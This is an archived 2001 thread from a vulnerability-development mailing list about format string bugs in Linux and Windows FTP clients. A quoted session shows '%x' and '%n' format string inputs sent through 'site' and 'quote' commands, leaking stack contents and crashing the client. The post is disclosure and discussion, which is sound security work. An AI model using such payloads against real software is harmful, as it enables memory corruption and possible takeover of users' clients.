Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

[Ftp client , Format strings and SEGFAULTS]

From: KF <dotslash () snosoft com>
Date: Wed, 05 Dec 2001 12:51:22 -0500

These issues have been pointed out a number of times in the past... no
one has done anything about 
them. I think the last time this thread was started up for the 20th time
was about when the wu 2.6.1 site exec issue came out... a number of
people noticed the problem while testing their own servers. Theses isues
are present in a number of linux ftp clients ... also in the windows NT
ftp.exe
Theoretically a server could construct a malicious response to a site
quote command and maybe take 
control of the client... The issues with ls are new obviously but it
doesn't seem to me that vendors
are hard pressed on fixing client side ftp client issues. 
-KF 



U dong-houn wrote:


 Have ever experienced such work before me.
 At that time, as well as Proftpd,
 by format string limitation that is found in wu-ftpd and so on, was  mistaking.
 It is that is client limitation that was stupid justly.

 Format string bug happens in ftp client by source.
 Can see this now.

 bash-2.04$ ftp 127.0.0.1
 Connected to 127.0.0.1.
 ...
 Name (127.0.0.1:x82): x82
 331 Password required for x82.
 Password:
 230 User x82 logged in.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ...
 ftp> site AAAA%x%x%x%x%x%x%x%x%x%x
 500 'SITE AAAA806C1A527FA805164828057650BFFFE9C4BFFFC190455449534141412025782541' not understood.

 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 AAAA806C1A627FF805164828057650BFFFE9C4BFFFC190414141417825782578257825 not understood.

 ftp> site AAAA%x%x%x%x%x%x%x%x%n
 Segmentation fault (core dumped)
 bash-2.04$

 Stupid ftp client program may have to be re-formed.
 Desire there is no mistake ...
 If use a debugging tool, can see that have been expired in client.

 --

 by Xpl017Elz

 P.S: Always so ...
      Sorry. I gave up original English.
      Study English since next time. So, make understood other people.
      Thank you for reading unwise writing. ^-^*

--

Powered by Outblaze
Previous By Date Next
Previous By Thread Next

Current thread: